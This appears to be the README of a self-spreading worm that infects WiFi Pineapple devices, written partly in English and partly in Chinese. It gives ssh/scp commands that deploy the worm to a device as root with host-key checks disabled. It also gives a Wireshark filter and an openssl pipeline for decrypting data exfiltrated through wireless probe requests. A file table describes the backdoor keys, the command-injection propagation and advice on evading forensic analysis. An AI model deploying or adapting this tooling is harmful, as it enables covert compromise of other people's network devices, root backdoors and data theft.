
A WiFi Pineapple infecting worm.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
注意:你需要一台已配置的设备,或者使用 metasploit-module 来启用 ssh
Wireshark 过滤器为:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
可选地,可以这样使用 harvest.py 脚本:
python harvest.py [monitor-iface]
| File | Purpose |
|---|---|
| tv | 病毒本体。 |
| tvbd | “主”后门密钥,请勿分发私钥。 |
| tvd | 披露密钥,用于通过探测请求外泄数据。 |
| tospo_rsa | 每台受感染设备独有的身份私钥,用作传输密钥。 |
| tospo_rsa.pub | 身份公钥,通过命令注入页面传输,使私密身份能够在远程设备上以 root 身份执行操作。 |
| w | 下发的无线配置选项,用于恢复先前的连接。 |
| n | 下发的网络配置选项,用于恢复先前的连接。 |
| 注意:以 'tv' 开头的文件在感染新设备时都会被传输。请勿使用以 'tv' 开头的名称添加私钥等文件,否则你的私钥将暴露于取证分析中。 |